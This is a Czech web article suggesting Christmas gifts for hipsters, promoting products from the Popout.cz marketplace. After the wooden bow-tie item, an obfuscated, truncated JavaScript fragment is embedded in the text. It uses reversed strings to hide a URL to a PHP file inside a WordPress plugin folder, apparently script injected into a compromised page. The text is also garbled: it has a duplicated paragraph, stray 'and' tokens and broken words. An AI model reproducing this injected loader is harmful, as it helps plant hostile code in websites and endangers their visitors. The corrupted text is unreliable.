FACESTARBydleníTIPY NA ZARUČENĚ NETRADIČNÍ VÁNOČNÍ DÁRKY! UDĚLEJTE RADOST HIPSTERŮM!

TIPY NA ZARUČENĚ NETRADIČNÍ VÁNOČNÍ DÁRKY! UDĚLEJTE RADOST HIPSTERŮM!

Především byste měli vědět, čím hipsteři opovrhují, a to je komerce. Zcela nevhodné jsou tedy všechny věci, které komercí moc zavánějí. Naopak u nich zabodujete tím, co je umělecké či retro. Potrpí si na výrazné brýle se silnými obroučkami a hudbu poslouchají z vinylových desek.

Především byste měli vědět, čím hipsteři opovrhují, a to je komerce. Zcela nevhodné jsou tedy všechny věci, které komercí moc zavánějí. Naopak u nich zabodujete tím, co je umělecké či retro. Potrpí si na výrazné brýle se silnými obroučkami a hudbu poslouchají z vinylových desek.

Jestliže sháníte dárek pro hipstera, inspirujte se zde:

Dřevěný motýlek

Slušivým doplňkem každého hipstera je motýlek. A jestli chcete pořídit super hipsterský motýlek, kupte dřevěný. A pokud se váš známy k hipsterské subkultuře neřadí, ale nepohrdne neobyčejnými věcmi, i pro něj bude dřevěný motýlek dobrým dárkem. Tento je vyrobený v ČR, je z jabloňového dřeva a nese značku BeWooden.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand20wallet20Red20Virilia.jpg“ />

Městský batoh

Značka Braasi Industry nabízí batohy, které působí dojmem, jako by patřily do trochu jiné doby. Některé se hodí na kolo, aprotože každý správný hipster na kole jezdí, takový batoh semu šikne. Patrně si do něj dá vinylové desky, starý analogový fotoaparát nebo knihu poezie. Batoh je vyrobený v ČR.

and and

Kukačky z kartónu

Ekologické papírové hodiny z recyklované lepenky jsou určitě dobrým dárkem pro každého, kdo se zajímá o ekologii, nerad plýtvá a je přítelem recyklace starých věcí. A protože hipsteři jsou lidé soucítící, ochrana životního prostředí je téma, které je zajímá. Tyto hodiny byly vyrobeny v ČR pod značkou Kartoons.

and and

Kožená cyklobrašna

Brašna, kterou můžete připevnit na kolo, a zároveň ji nosit přes rameno, potěší každého cyklistu. Když bude navíc kožená, rozhodně jí nepohrdne ani žádný hipster. Brašna vyrobená v ČR nese značku Lift Off.

and

Kožená aktovka

Nad posledním dárkem každý hipster mmusí zajásat. Je to ručně vyrobená aktovka, jejíž autorkou je česká designérka Elajediova. Aktovka do ruky má vzhled, který neodmyslitelně patří k hipsterskému outfitu. Všechny tyto dárky koupíte na stránkách Popout.cz, což je místo, kde designéři mohou jednoduchým způsobem představitsvé výrobky, svůj příběh, a oslovit tak ty, co hledají krásné a originální dárky, doplňky nebo dekoraci. Z velkého množství rozličných produktů pomáhá vybrat jen ty kvalitní, řemeslně zpracované, za kterými stojí tvůrci se zajímavou historií.

and

Designéři, kteří prodávají na Popoutu pracují s přírodními materiály a jejich produkty bývají k dostání v limitovaných edicích. Jakmile si od nich něco objednáte, je naprosto jasné, že dostanete výrobek s krásným příběhem.

Související články